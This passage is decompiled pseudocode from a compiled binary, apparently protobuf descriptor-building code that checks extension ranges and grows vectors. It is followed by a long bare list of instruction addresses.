											_t757 =  *((intOrPtr*)( *(_t774 + 0x1c) + 4));
											_t422 =  *(_t560 + 0x20) + _t418 * 8 +  *(_t560 + 0x20) + _t418 * 8 +  *(_t560 + 0x20) + _t418 * 8 +  *(_t560 + 0x20) + _t418 * 8 +  *(_t560 + 0x20) + _t418 * 8 +  *(_t560 + 0x20) + _t418 * 8 +  *(_t560 + 0x20) + _t418 * 8 +  *(_t560 + 0x20) + _t418 * 8;
											_t813 = _t422;
											if(_t422 == 0) {
												L131:
												_t758 = 0;
												 *(_t771 + 0x3c) = _t422;
												if( *(_t560 + 0x20) <= 0) {
													L134:
													if(( *(_t560 + 0x64) >> 0x00000006 & 0x00000001) != 0) {
														L137:
														_t423 =  *(_t560 + 0x5c);
														__eflags =  *(_t560 + 0x5c);
														if(__eflags == 0) {
															_t423 =  *( *0x55fb58 + 0x5c);
														}
														E004834E0( *(_t771 + 4), _t423, _t771, __eflags,  *(_t774 + 0x1c),  *(_t771 + 4), _t771);
														L140:
														_t663 =  *((intOrPtr*)(_t774 + 0x38));
														L00475F70( *(_t774 + 0x2c),  *((intOrPtr*)(_t774 + 0x38)), _t771,  *(_t771 + 4),  *_t771, _t560, 1, _t771);
														_t427 =  *(_t771 + 0x18);
														 *(_t774 + 0x24) = 0;
														if( *(_t771 + 0x18) <= 0) {
															L159:
															if( *((intOrPtr*)(_t771 + 0x30)) <= 0) {
																L178:
																 *[fs:0x0] =  *((intOrPtr*)(_t774 + 0x39c));
																_pop(_t719);
																_pop(_t759);
																_pop(_t561);
																return L004EEDC9(_t427, _t561,  *(_t774 + 0x380) ^ _t774, _t663, _t719, _t759);
															}
															_t562 = 1;
															 *(_t774 + 0x28) = 1;
															 *(_t774 + 0x18) = 0;
															do {
																_t721 =  *(_t771 + 0x34) +  *(_t774 + 0x18);
																 *(_t774 + 0x24) = _t721;
																if(_t562 >=  *((intOrPtr*)(_t771 + 0x30))) {
																	goto L177;
																} else {
																	goto L162;
																}
																do {
																	L162:
																	_t583 =  *(_t771 + 0x34);
																	_t427 =  *(_t721 + 4);
																	_t760 = _t583 + _t562 * 8;
																	if( *(_t721 + 4) <=  *(_t583 + _t562 * 8)) {
																		goto L175;
																	}
																	_t663 =  *((intOrPtr*)(_t760 + 4));
																	if( *((intOrPtr*)(_t760 + 4)) <=  *_t721) {
																		goto L175;
																	}
																	_t430 = L004A1A10(_t774 + 0x25c, _t427 - 1);
																	 *((intOrPtr*)(_t774 + 0x254)) = _t430;
																	_t325 = _t430 + 1; // 0x1
																	_t664 = _t325;
																	do {
																		_t585 =  *_t430;
																		_t430 = _t430 + 1;
																	} while (_t585 != 0);
																	 *((intOrPtr*)(_t774 + 0x258)) = _t430 - _t664;
																	_t433 = L004A1A10(_t774 + 0x374,  *_t721);
																	 *((intOrPtr*)(_t774 + 0x36c)) = _t433;
																	_t329 = _t433 + 1; // 0x1
																	_t665 = _t329;
																	do {
																		_t587 =  *_t433;
																		_t433 = _t433 + 1;
																	} while (_t587 != 0);
																	 *((intOrPtr*)(_t774 + 0x370)) = _t433 - _t665;
																	_t436 = L004A1A10(_t774 + 0x2ac,  *((intOrPtr*)(_t760 + 4)) - 1);
																	 *((intOrPtr*)(_t774 + 0x2a4)) = _t436;
																	_t334 = _t436 + 1; // 0x1
																	_t666 = _t334;
																	do {
																		_t590 =  *_t436;
																		_t436 = _t436 + 1;
																	} while (_t590 != 0);
																	 *((intOrPtr*)(_t774 + 0x2a8)) = _t436 - _t666;
																	_t439 = L004A1A10(_t774 + 0x34c,  *_t760);
																	 *((intOrPtr*)(_t774 + 0x344)) = _t439;
																	_t338 = _t439 + 1; // 0x1
																	_t592 = _t338;
																	do {
																		_t667 =  *_t439;
																		_t439 = _t439 + 1;
																	} while (_t667 != 0);
																	 *((intOrPtr*)(_t774 + 0x348)) = _t439 - _t592;
																	 *((intOrPtr*)(_t774 + 0x104)) = 0;
																	 *((intOrPtr*)(_t774 + 0x154)) = 0;
																	 *((intOrPtr*)(_t774 + 0x8c)) = 0;
																	 *((intOrPtr*)(_t774 + 0x1a4)) = 0;
																	 *((intOrPtr*)(_t774 + 0x1f4)) = 0;
																	 *((intOrPtr*)(_t774 + 0x1cc)) = 0;
																	_t761 = _t760 | 0xffffffff;
																	 *(_t774 + 0x134) = _t761;
																	 *(_t774 + 0x184) = _t761;
																	 *(_t774 + 0xbc) = _t761;
																	 *(_t774 + 0x1d4) = _t761;
																	 *(_t774 + 0x224) = _t761;
																	 *(_t774 + 0x1fc) = _t761;
																	_t446 = L004BEFD0(_t774 + 0xb8, _t774 + 0x240, "Extension range $0 to $1 overlaps with already-defined range $2 to $3.", _t774 + 0x364, _t774 + 0x2c0, _t774 + 0x384, _t774 + 0x268, _t774 + 0x1dc, _t774 + 0x200, _t774 + 0x1ac, _t774 + 0x158, _t774 + 0x104);
																	_t774 = _t774 + 0x2c;
																	 *(_t774 + 0x3a4) = 9;
																	_t663 = _t446;
																	_t427 = L00474E20(_t446,  *(_t774 + 0x1c), _t771,  *(_t771 + 4),  *((intOrPtr*)( *((intOrPtr*)( *(_t774 + 0x30) + 0x4c)) + _t562 * 4)), 1);
																	 *(_t774 + 0x3a4) = _t761;
																	if( *((intOrPtr*)(_t774 + 0x230)) >= 0x10) {
																		_push( *((intOrPtr*)(_t774 + 0x21c)));
																		_t427 = L004EEDBE();
																		_t774 = _t774 + 4;
																	}
																	_t721 =  *(_t774 + 0x24);
																	L175:
																	_t562 = _t562 + 1;
																} while (_t562 <  *((intOrPtr*)(_t771 + 0x30)));
																_t562 =  *(_t774 + 0x28);
																L177:
																 *(_t774 + 0x18) =  *(_t774 + 0x18) + 8;
																_t562 = _t562 + 1;
																_t378 = _t562 - 1; // 0x0
																 *(_t774 + 0x28) = _t562;
															} while (_t378 <  *((intOrPtr*)(_t771 + 0x30)));
															goto L178;
														}
														 *(_t774 + 0x20) = 0;
														do {
															_t564 =  *((intOrPtr*)(_t771 + 0x1c)) +  *(_t774 + 0x20);
															_t448 = 0;
															 *(_t774 + 0x18) = 0;
															if( *((intOrPtr*)(_t771 + 0x30)) <= 0) {
																goto L158;
															}
															do {
																_t762 =  *(_t771 + 0x34) + _t448 * 8;
																_t599 =  *((intOrPtr*)(_t564 + 0x14));
																if( *_t762 <= _t599 && _t599 <  *((intOrPtr*)(_t762 + 4))) {
																	_t452 = L004A1A10(_t774 + 0x324, _t599);
																	 *((intOrPtr*)(_t774 + 0x31c)) = _t452;
																	_t250 = _t452 + 1; // 0x1
																	_t674 = _t250;
																	do {
																		_t600 =  *_t452;
																		_t452 = _t452 + 1;
																	} while (_t600 != 0);
																	 *((intOrPtr*)(_t774 + 0x320)) = _t452 - _t674;
																	_t454 =  *_t564;
																	if( *((intOrPtr*)(_t454 + 0x14)) < 0x10) {
																		 *((intOrPtr*)(_t774 + 0x2f4)) = _t454;
																	} else {
																		 *((intOrPtr*)(_t774 + 0x2f4)) =  *_t454;
																	}
																	 *((intOrPtr*)(_t774 + 0x2f8)) =  *((intOrPtr*)(_t454 + 0x10));
																	_t457 = L004A1A10(_t774 + 0x284,  *((intOrPtr*)(_t762 + 4)) - 1);
																	 *((intOrPtr*)(_t774 + 0x27c)) = _t457;
																	_t260 = _t457 + 1; // 0x1
																	_t675 = _t260;
																	do {
																		_t603 =  *_t457;
																		_t457 = _t457 + 1;
																	} while (_t603 != 0);
																	 *((intOrPtr*)(_t774 + 0x280)) = _t457 - _t675;
																	_t460 = L004A1A10(_t774 + 0x2d4,  *_t762);
																	 *((intOrPtr*)(_t774 + 0x2cc)) = _t460;
																	_t264 = _t460 + 1; // 0x1
																	_t605 = _t264;
																	do {
																		_t676 =  *_t460;
																		_t460 = _t460 + 1;
																	} while (_t676 != 0);
																	 *((intOrPtr*)(_t774 + 0x2d0)) = _t460 - _t605;
																	 *((intOrPtr*)(_t774 + 0xe0)) = 0;
																	 *((intOrPtr*)(_t774 + 0x40)) = 0;
																	 *((intOrPtr*)(_t774 + 0xb8)) = 0;
																	 *((intOrPtr*)(_t774 + 0x180)) = 0;
																	 *((intOrPtr*)(_t774 + 0x130)) = 0;
																	 *((intOrPtr*)(_t774 + 0x68)) = 0;
																	_t763 = _t762 | 0xffffffff;
																	 *(_t774 + 0x10c) = _t763;
																	 *(_t774 + 0x6c) = _t763;
																	 *(_t774 + 0xe4) = _t763;
																	 *(_t774 + 0x1ac) = _t763;
																	 *(_t774 + 0x15c) = _t763;
																	 *(_t774 + 0x94) = _t763;
																	_t466 = L004BEFD0(_t774 + 0xe0, _t774 + 0x25c, "Extension range $0 to $1 includes field \"$2\" ($3).", _t774 + 0x2ec, _t774 + 0x298, _t774 + 0x30c, _t774 + 0x330, _t774 + 0x74, _t774 + 0x138, _t774 + 0x184, _t774 + 0x40, _t774 + 0xdc);
																	_t774 = _t774 + 0x2c;
																	 *(_t774 + 0x3a4) = 7;
																	_t663 = _t466;
																	L00474E20(_t466,  *(_t774 + 0x1c), _t771,  *((intOrPtr*)(_t564 + 4)),  *((intOrPtr*)( *((intOrPtr*)( *(_t774 + 0x30) + 0x4c)) +  *(_t774 + 0x18) * 4)), 1);
																	 *(_t774 + 0x3a4) = _t763;
																	if( *((intOrPtr*)(_t774 + 0x24c)) >= 0x10) {
																		_push( *((intOrPtr*)(_t774 + 0x238)));
																		L004EEDBE();
																		_t774 = _t774 + 4;
																	}
																}
																_t448 =  *(_t774 + 0x18) + 1;
																 *(_t774 + 0x18) = _t448;
															} while (_t448 <  *((intOrPtr*)(_t771 + 0x30)));
															L158:
															 *(_t774 + 0x20) =  *(_t774 + 0x20) + 0x48;
															_t427 =  *(_t774 + 0x24) + 1;
															 *(_t774 + 0x24) = _t427;
														} while (_t427 <  *(_t771 + 0x18));
														goto L159;
													}
													 *(_t771 + 0x10) = 0;
													goto L140;
												}
												_t724 = 0;
												do {
													_push(1);
													_push( *(_t771 + 0x3c) + _t724);
													_push(_t771);
													L00478C70( *(_t774 + 0x1c),  *((intOrPtr*)( *((intOrPtr*)(_t560 + 0x1c)) + _t758 * 4)));
													_t758 = _t758 + 1;
													_t724 = _t724 + 0x48;
												} while (_t758 <  *(_t560 + 0x20));
												goto L134;
											}
											_push(_t422);
											 *(_t774 + 0x18) = L004EF8DA(_t560, _t572, _t659, _t718, _t757, _t813);
											_t475 =  *(_t757 + 0x9c);
											_t687 = _t774 + 0x18;
											_t774 = _t774 + 4;
											if(_t687 >= _t475) {
												L110:
												_t189 = _t757 + 0xa0; // 0x41544146
												_t613 =  *_t189;
												__eflags = _t475 - _t613;
												if(_t475 != _t613) {
													L127:
													_t476 =  *(_t757 + 0x9c);
													__eflags = _t476;
													if(_t476 != 0) {
														 *_t476 =  *(_t774 + 0x14);
													}
													_t560 =  *(_t774 + 0x30);
													L130:
													 *(_t757 + 0x9c) =  *(_t757 + 0x9c) + 4;
													_t422 =  *(_t774 + 0x14);
													goto L131;
												}
												_t190 = _t757 + 0x98; // 0xc0
												_t689 =  *_t190;
												_t478 = _t475 - _t689 >> 2;
												__eflags = _t478 - 0x3ffffffe;
												if(_t478 > 0x3ffffffe) {
													_t478 = E004EE38E("vector<T> too long");
												}
												_t479 = _t478 + 1;
												_t615 = _t613 - _t689 >> 2;
												__eflags = _t479 - _t615;
												if(_t479 <= _t615) {
													goto L127;
												} else {
													_t565 = _t615;
													_t691 = _t565 >> 1;
													__eflags = 0x3fffffff - _t691 - _t565;
													if(0x3fffffff - _t691 >= _t565) {
														_t560 = _t565 + _t691;
														__eflags = _t560;
													} else {
														_t560 = 0;
													}
													__eflags = _t560 - _t479;
													if(_t560 < _t479) {
														_t560 = _t479;
													}
													__eflags = _t560 - 0x3fffffff;
													if(_t560 > 0x3fffffff) {
														E004EE38E("vector<T> too long");
													}
													__eflags = _t615 - _t560;
													if(_t615 >= _t560) {
														goto L127;
													} else {
														 *(_t774 + 0x18) = 0;
														__eflags = _t560;
														if(__eflags <= 0) {
															L124:
															E004EF0C0( *(_t774 + 0x20),  *(_t757 + 0x98), ( *(_t757 + 0x9c) -  *(_t757 + 0x98) >> 2) + ( *(_t757 + 0x9c) -  *(_t757 + 0x98) >> 2) + ( *(_t757 + 0x9c) -  *(_t757 + 0x98) >> 2) + ( *(_t757 + 0x9c) -  *(_t757 + 0x98) >> 2));
															_t486 =  *(_t757 + 0x98);
															_t774 = _t774 + 0xc;
															_t730 =  *(_t757 + 0x9c) - _t486 >> 2;
															__eflags = _t486;
															if(_t486 != 0) {
																_push(_t486);
																L004EEDBE();
																_t774 = _t774 + 4;
															}
															_t487 =  *(_t774 + 0x18);
															 *((intOrPtr*)(_t757 + 0xa0)) = _t487 + _t560 * 4;
															 *(_t757 + 0x9c) = _t487 + _t730 * 4;
															 *(_t757 + 0x98) = _t487;
															goto L127;
														}
														_push(_t560 * 4);
														_t489 = L004EF8DA(_t560, _t615, _t560 * 4, 0, _t757, __eflags);
														_t774 = _t774 + 4;
														 *(_t774 + 0x18) = _t489;
														__eflags = _t489;
														if(_t489 == 0) {
															 *(_t774 + 0x2c) = 0;
															 *(_t774 + 0x28) = 0x52fd98;
															 *(_t774 + 0x3a4) = 5;
															E00404190(_t774 + 0x28);
															goto L137;
														}
														goto L124;
													}
												}
											}
											_t731 =  *(_t757 + 0x98);
											if(_t731 > _t687) {
												goto L110;
											}
											_t620 =  *((intOrPtr*)(_t757 + 0xa0));
											_t695 = _t687 - _t731 >> 2;
											 *(_t774 + 0x28) = _t695;
											if(_t475 != _t620) {
												L107:
												_t696 =  *(_t757 + 0x98) + _t695 * 4;
												_t493 =  *(_t757 + 0x9c);
												if(_t493 != 0) {
													 *_t493 =  *_t696;
												}
												goto L130;
											}
											_t495 = _t475 - _t731 >> 2;
											if(_t495 > 0x3ffffffe) {
												_t495 = E004EE38E("vector<T> too long");
											}
											_t623 = _t620 - _t731 >> 2;
											_t496 = _t495 + 1;
											 *(_t774 + 0x20) = _t623;
											if(_t496 <= _t623) {
												goto L107;
											} else {
												_t698 = _t623 >> 1;
												if(0x3fffffff - _t698 >= _t623) {
													_t624 = _t623 + _t698;
													__eflags = _t624;
												} else {
													_t624 = 0;
												}
												 *(_t774 + 0x18) = _t624;
												if(_t624 < _t496) {
													_t624 = _t496;
													 *(_t774 + 0x18) = _t624;
												}
												if(_t624 > 0x3fffffff) {
													E004EE38E("vector<T> too long");
												}
												if( *(_t774 + 0x20) >= _t624) {
													L106:
													_t695 =  *(_t774 + 0x28);
													goto L107;
												} else {
													 *(_t774 + 0x20) = 0;
													_t823 = _t624;
													if(_t624 <= 0) {
														L103:
														E004EF0C0( *(_t774 + 0x28),  *(_t757 + 0x98), ( *(_t757 + 0x9c) -  *(_t757 + 0x98) >> 2) + ( *(_t757 + 0x9c) -  *(_t757 + 0x98) >> 2) + ( *(_t757 + 0x9c) -  *(_t757 + 0x98) >> 2) + ( *(_t757 + 0x9c) -  *(_t757 + 0x98) >> 2));
														_t503 =  *(_t757 + 0x98);
														_t774 = _t774 + 0xc;
														_t737 =  *(_t757 + 0x9c) - _t503 >> 2;
														if(_t503 != 0) {
															_push(_t503);
															L004EEDBE();
															_t774 = _t774 + 4;
														}
														_t504 =  *(_t774 + 0x20);
														 *((intOrPtr*)(_t757 + 0xa0)) = _t504 +  *(_t774 + 0x18) * 4;
														 *(_t757 + 0x9c) = _t504 + _t737 * 4;
														 *(_t757 + 0x98) = _t504;
														goto L106;
													}
													_push(_t624 * 4);
													_t506 = L004EF8DA(_t560, _t624, _t624 * 4, 0, _t757, _t823);
													_t774 = _t774 + 4;
													 *(_t774 + 0x20) = _t506;
													if(_t506 == 0) {
														 *((intOrPtr*)(_t774 + 0x38)) = 0;
														 *(_t774 + 0x34) = 0x52fd98;
														_t757 = _t774 + 0x34;
														 *(_t774 + 0x3a4) = 4;
														_t475 = E00404190(_t757);
														goto L110;
													}
													goto L103;
												}
											}
										}
										do {
											_t659 = _t771;
											L004799D0( *(_t774 + 0x1c), _t771,  *((intOrPtr*)( *((intOrPtr*)(_t560 + 0x4c)) + _t718 * 4)), _t771,  *(_t771 + 0x34) + _t718 * 8);
											_t718 = _t718 + 1;
										} while (_t718 <  *((intOrPtr*)(_t560 + 0x50)));
										goto L86;
									}
									_push(_t416);
									_t510 = L004EF8DA(_t560, _t571, _t659, _t717, _t756, _t801);
									_t766 = _t756 + 0x98;
									 *(_t774 + 0x18) = _t510;
									_t511 = _t766[1];
									_t659 = _t774 + 0x18;
									_t774 = _t774 + 4;
									if(_t659 >= _t511) {
										L70:
										_t630 = _t766[2];
										__eflags = _t511 - _t630;
										if(_t511 == _t630) {
											_t659 =  *_t766;
											_t514 = _t511 - _t659 >> 2;
											__eflags = _t514 - 0x3ffffffe;
											if(_t514 > 0x3ffffffe) {
												_t514 = E004EE38E("vector<T> too long");
											}
											_t515 = _t514 + 1;
											_t632 = _t630 - _t659 >> 2;
											__eflags = _t515 - _t632;
											if(_t515 > _t632) {
												_t659 = _t632 >> 1;
												__eflags = 0x3fffffff - _t659 - _t632;
												if(0x3fffffff - _t659 >= _t632) {
													_t633 = _t632 + _t659;
													__eflags = _t633;
												} else {
													_t633 = 0;
												}
												__eflags = _t633 - _t515;
												if(_t633 < _t515) {
													_t633 = _t515;
												}
												L0041FEF0(_t766, _t633);
											}
										}
										_t512 = _t766[1];
										__eflags = _t512;
										if(__eflags != 0) {
											_t659 =  *(_t774 + 0x14);
											 *_t512 =  *(_t774 + 0x14);
										}
										L82:
										_t766[1] = _t766[1] + 4;
										_t416 =  *(_t774 + 0x14);
										goto L83;
									}
									_t740 =  *_t766;
									if(_t740 > _t659) {
										goto L70;
									}
									_t635 = _t766[2];
									_t705 = _t659 - _t740 >> 2;
									 *(_t774 + 0x28) = _t705;
									if(_t511 == _t635) {
										_t520 = _t511 - _t740 >> 2;
										if(_t520 > 0x3ffffffe) {
											_t520 = E004EE38E("vector<T> too long");
										}
										_t521 = _t520 + 1;
										_t638 = _t635 - _t740 >> 2;
										if(_t521 > _t638) {
											_t707 = _t638 >> 1;
											if(0x3fffffff - _t707 >= _t638) {
												_t639 = _t638 + _t707;
												__eflags = _t639;
											} else {
												_t639 = 0;
											}
											if(_t639 < _t521) {
												_t639 = _t521;
											}
											L0041FEF0(_t766, _t639);
											_t705 =  *(_t774 + 0x28);
										}
									}
									_t659 =  *_t766 + _t705 * 4;
									_t518 = _t766[1];
									if(_t518 != 0) {
										 *_t518 =  *_t659;
									}
									goto L82;
								}
								_t767 = 0;
								do {
									_t659 =  *(_t771 + 0x2c) + _t767;
									_push( *(_t771 + 0x2c) + _t767);
									_push(_t771);
									L00479B00( *((intOrPtr*)( *((intOrPtr*)( *(_t774 + 0x30) + 0x3c)) + _t717 * 4)),  *(_t774 + 0x1c),  *(_t771 + 0x2c) + _t767);
									_t717 = _t717 + 1;
									_t767 = _t767 + 0x20;
								} while (_t717 <  *((intOrPtr*)( *(_t774 + 0x30) + 0x40)));
								goto L55;
							}
							_push(_t411);
							_t526 = L004EF8DA(_t559, _t570, _t659, _t716, _t755, _t789);
							_t89 = _t716 + 0x98; // 0x9c
							_t768 = _t89;
							 *(_t774 + 0x18) = _t526;
							_t527 = _t768[1];
							_t659 = _t774 + 0x18;
							_t774 = _t774 + 4;
							if(_t659 >= _t527) {
								L39:
								_t642 = _t768[2];
								__eflags = _t527 - _t642;
								if(_t527 == _t642) {
									_t659 =  *_t768;
									_t530 = _t527 - _t659 >> 2;
									__eflags = _t530 - 0x3ffffffe;
									if(_t530 > 0x3ffffffe) {
										_t530 = E004EE38E("vector<T> too long");
									}
									_t531 = _t530 + 1;
									_t644 = _t642 - _t659 >> 2;
									__eflags = _t531 - _t644;
									if(_t531 > _t644) {
										_t659 = _t644 >> 1;
										__eflags = 0x3fffffff - _t659 - _t644;
										if(0x3fffffff - _t659 >= _t644) {
											_t645 = _t644 + _t659;
											__eflags = _t645;
										} else {
											_t645 = 0;
										}
										__eflags = _t645 - _t531;
										if(_t645 < _t531) {
											_t645 = _t531;
										}
										L0041FEF0(_t768, _t645);
									}
								}
								_t528 = _t768[1];
								__eflags = _t528;
								if(__eflags != 0) {
									_t659 =  *(_t774 + 0x14);
									 *_t528 =  *(_t774 + 0x14);
								}
								L51:
								_t768[1] = _t768[1] + 4;
								_t411 =  *(_t774 + 0x14);
								goto L52;
							}
							_t745 =  *_t768;
							if(_t745 > _t659) {
								goto L39;
							}
							_t647 = _t768[2];
							_t711 = _t659 - _t745 >> 2;
							 *(_t774 + 0x28) = _t711;
							if(_t527 == _t647) {
								_t536 = _t527 - _t745 >> 2;
								if(_t536 > 0x3ffffffe) {
									_t536 = E004EE38E("vector<T> too long");
								}
								_t537 = _t536 + 1;
								_t650 = _t647 - _t745 >> 2;
								if(_t537 > _t650) {
									_t713 = _t650 >> 1;
									if(0x3fffffff - _t713 >= _t650) {
										_t651 = _t650 + _t713;
										__eflags = _t651;
									} else {
										_t651 = 0;
									}
									if(_t651 < _t537) {
										_t651 = _t537;
									}
									L0041FEF0(_t768, _t651);
									_t711 =  *(_t774 + 0x28);
								}
							}
							_t659 =  *_t768 + _t711 * 4;
							_t534 = _t768[1];
							if(_t534 != 0) {
								 *_t534 =  *_t659;
							}
							goto L51;
						} else {
							 *(_t774 + 0x14) = 0;
							do {
								_t659 =  *(_t559 + 0x2c);
								_t570 = _t715;
								E00478010(_t715,  *(_t559 + 0x2c),  *((intOrPtr*)( *(_t559 + 0x2c) + _t755 * 4)), _t771,  *(_t771 + 0x24) +  *(_t774 + 0x14));
								 *(_t774 + 0x14) =  *(_t774 + 0x14) + 0x40;
								_t755 = _t755 + 1;
							} while (_t755 <  *(_t559 + 0x30));
							goto L24;
						}
					}
					_push(_t408);
					_t541 = L004EF8DA(_t559, _t570, _t659, _t715, _t754, _t781);
					_t570 =  *(_t754 + 0x9c);
					_t659 = _t774 + 0x18;
					_t774 = _t774 + 4;
					 *(_t774 + 0x14) = _t541;
					if(_t659 >= _t570) {
						L16:
						__eflags = _t570 -  *((intOrPtr*)(_t754 + 0xa0));
						if(_t570 ==  *((intOrPtr*)(_t754 + 0xa0))) {
							_t570 = 1;
							_t68 = _t754 + 0x98; // 0x9c
							E00480450(_t68, 1);
						}
						_t542 =  *(_t754 + 0x9c);
						__eflags = _t542;
						if(__eflags != 0) {
							_t570 =  *(_t774 + 0x14);
							 *_t542 =  *(_t774 + 0x14);
						}
						L20:
						 *(_t754 + 0x9c) =  *(_t754 + 0x9c) + 4;
						_t408 =  *(_t774 + 0x14);
						goto L21;
					}
					_t659 =  *(_t754 + 0x98);
					_t545 = _t774 + 0x14;
					if(_t659 > _t545) {
						goto L16;
					} else {
						_t547 = _t545 - _t659 >> 2;
						 *(_t774 + 0x28) = _t547;
						if(_t570 ==  *((intOrPtr*)(_t754 + 0xa0))) {
							_t61 = _t754 + 0x98; // 0x9c
							E00480450(_t61, 1);
							_t547 =  *(_t774 + 0x28);
						}
						_t548 =  *(_t754 + 0x98) + _t547 * 4;
						_t570 =  *(_t754 + 0x9c);
						if(_t570 != 0) {
							_t659 =  *_t548;
							 *_t570 =  *_t548;
						}
						goto L20;
					}
				} else {
					 *(_t774 + 0x14) = 0;
					do {
						_t659 =  *( *((intOrPtr*)(_t559 + 0xc)) + _t753 * 4);
						_push(0);
						_push( *((intOrPtr*)(_t771 + 0x1c)) +  *(_t774 + 0x14));
						_push(_t771);
						_t570 = _t715;
						L00478C70(_t715,  *( *((intOrPtr*)(_t559 + 0xc)) + _t753 * 4));
						 *(_t774 + 0x14) =  *(_t774 + 0x14) + 0x48;
						_t753 = _t753 + 1;
					} while (_t753 <  *(_t559 + 0x10));
					goto L9;
				}
			}

0x00478010
0x00478010
0x00478012
0x0047801d
0x0047801e
0x00478024
0x0047802b
0x00478036
0x0047803d
0x00478045
0x0047804b
0x00478052
0x00478059
0x00478060
0x00478062
0x00478066
0x0047806a
0x0047806e
0x00478076
0x00478078
0x0047807a
0x0047807a
0x00478080
0x00478085
0x0047808a
0x0047808e
0x00478092
0x0047809a
0x0047809a
0x004780ac
0x004780b8
0x004780b9
0x004780bc
0x004780c9
0x004780ce
0x004780d2
0x004780d9
0x004780dc
0x004780df
0x004780e2
0x004780e5
0x004780ee
0x004780f1
0x004780f4
0x004780fe
0x004780fe
0x00478100
0x00478102
0x00478108
0x0047810c
0x0047810f
0x00478119
0x0047811e
0x00478122
0x00478122
0x00478126
0x00478128
0x0047812e
0x00478157
0x0047815a
0x00478160
0x00478163
0x00478166
0x00478168
0x00478208
0x00478208
0x0047820a
0x00478210
0x00478238
0x0047823b
0x00478241
0x00478244
0x00478247
0x00478249
0x0047833b
0x0047833b
0x0047833d
0x00478343
0x00478377
0x00478377
0x0047837e
0x00478382
0x00478388
0x0047838f
0x0047838f
0x00478391
0x00478483
0x00478483
0x00478485
0x0047848b
0x004784ae
0x004784b1
0x004784b5
0x004784b8
0x004784bb
0x004784c5
0x004784c5
0x004784c7
0x00478758
0x00478758
0x0047875a
0x00478760
0x00478785
0x0047878e
0x004787b9
0x004787b9
0x004787bc
0x004787be
0x004787c6
0x004787c6
0x004787d5
0x004787da
0x004787ee
0x004787f2
0x004787f7
0x004787fa
0x00478804
0x00478a0b
0x00478a0f
0x00478c3d
0x00478c44
0x00478c4c
0x00478c4d
0x00478c4f
0x00478c64
0x00478c64
0x00478a15
0x00478a1a
0x00478a1e
0x00478a30
0x00478a33
0x00478a37
0x00478a3e
0x00000000
0x00000000
0x00000000
0x00000000
0x00478a44
0x00478a44
0x00478a44
0x00478a47
0x00478a4d
0x00478a50
0x00000000
0x00000000
0x00478a56
0x00478a5b
0x00000000
0x00000000
0x00478a6b
0x00478a70
0x00478a77
0x00478a77
0x00478a80
0x00478a80
0x00478a82
0x00478a83
0x00478a8b
0x00478a99
0x00478a9e
0x00478aa5
0x00478aa5
0x00478aa8
0x00478aa8
0x00478aaa
0x00478aab
0x00478ab4
0x00478ac3
0x00478ac8
0x00478acf
0x00478acf
0x00478ad2
0x00478ad2
0x00478ad4
0x00478ad5
0x00478add
0x00478aeb
0x00478af0
0x00478af7
0x00478af7
0x00478b00
0x00478b00
0x00478b02
0x00478b03
0x00478b09
0x00478b12
0x00478b19
0x00478b20
0x00478b27
0x00478b2e
0x00478b35
0x00478b84
0x00478b9b
0x00478ba2
0x00478ba9
0x00478bb0
0x00478bb7
0x00478bbe
0x00478bc5
0x00478bca
0x00478bd5
0x00478bed
0x00478bef
0x00478bf4
0x00478c03
0x00478c0c
0x00478c0d
0x00478c12
0x00478c12
0x00478c15
0x00478c19
0x00478c19
0x00478c1a
0x00478c23
0x00478c27
0x00478c27
0x00478c2c
0x00478c2d
0x00478c30
0x00478c34
0x00000000
0x00478a30
0x0047880a
0x00478812
0x00478815
0x00478819
0x0047881b
0x00478822
0x00000000
0x00000000
0x00478830
0x00478833
0x00478836
0x0047883b
0x00478851
0x00478856
0x0047885d
0x0047885d
0x00478860
0x00478860
0x00478862
0x00478863
0x00478869
0x00478870
0x00478876
0x00478883
0x00478878
0x0047887a
0x0047887a
0x00478890
0x0047889f
0x004788a4
0x004788ab
0x004788ab
0x004788b0
0x004788b0
0x004788b2
0x004788b3
0x004788bb
0x004788c9
0x004788ce
0x004788d5
0x004788d5
0x004788d8
0x004788d8
0x004788da
0x004788db
0x004788e1
0x004788f2
0x004788f9
0x004788fd
0x00478904
0x0047890b
0x00478912
0x0047894f
0x00478967
0x0047896e
0x00478972
0x00478979
0x00478980
0x00478987
0x0047898e
0x00478993
0x0047899e
0x004789ba
0x004789bc
0x004789c1
0x004789d0
0x004789d9
0x004789da
0x004789df
0x004789df
0x004789d0
0x004789e6
0x004789e7
0x004789eb
0x004789f4
0x004789f8
0x004789fd
0x004789fe
0x00478a02
0x00000000
0x00478812
0x00478790
0x00000000
0x00478790
0x00478762
0x00478764
0x00478771
0x00478775
0x00478776
0x00478777
0x0047877c
0x0047877d
0x00478780
0x00000000
0x00478764
0x004784cd
0x004784d3
0x004784d7
0x004784dd
0x004784e1
0x004784e6
0x00478646
0x00478646
0x00478646
0x0047864c
0x0047864e
0x00478739
0x00478739
0x0047873f
0x00478741
0x00478747
0x00478747
0x00478749
0x0047874d
0x0047874d
0x00478754
0x00000000
0x00478754
0x00478654
0x00478654
0x0047865c
0x0047865f
0x00478664
0x0047866b
0x0047866b
0x00478672
0x00478673
0x00478676
0x00478678
0x00000000
0x0047867e
0x0047867e
0x00478682
0x0047868b
0x0047868d
0x00478693
0x00478693
0x0047868f
0x0047868f
0x0047868f
0x00478695
0x00478697
0x00478699
0x00478699
0x0047869b
0x004786a1
0x004786a8
0x004786a8
0x004786ad
0x004786af
0x00000000
0x004786b5
0x004786b7
0x004786bb
0x004786bd
0x004786db
0x004786f7
0x004786fc
0x0047870a
0x0047870d
0x00478710
0x00478712
0x00478714
0x00478715
0x0047871a
0x0047871a
0x0047871d
0x00478727
0x0047872d
0x00478733
0x00000000
0x00478733
0x004786c6
0x004786c7
0x004786cc
0x004786cf
0x004786d3
0x004786d5
0x00478799
0x0047879d
0x004787a9
0x004787b4
0x00000000
0x004787b4
0x00000000
0x004786d5
0x004786af
0x00478678
0x004784ec
0x004784f6
0x00000000
0x00000000
0x004784fc
0x00478504
0x00478507
0x0047850d
0x00478606
0x0047860c
0x0047860f
0x00478617
0x0047861f
0x0047861f
0x00000000
0x00478617
0x00478515
0x0047851d
0x00478524
0x00478524
0x0047852b
0x0047852e
0x0047852f
0x00478535
0x00000000
0x0047853b
0x0047853d
0x00478548
0x0047854e
0x0047854e
0x0047854a
0x0047854a
0x0047854a
0x00478550
0x00478556
0x00478558
0x0047855a
0x0047855a
0x00478564
0x0047856b
0x0047856b
0x00478574
0x00478602
0x00478602
0x00000000
0x0047857a
0x0047857c
0x00478580
0x00478582
0x004785a0
0x004785bc
0x004785c1
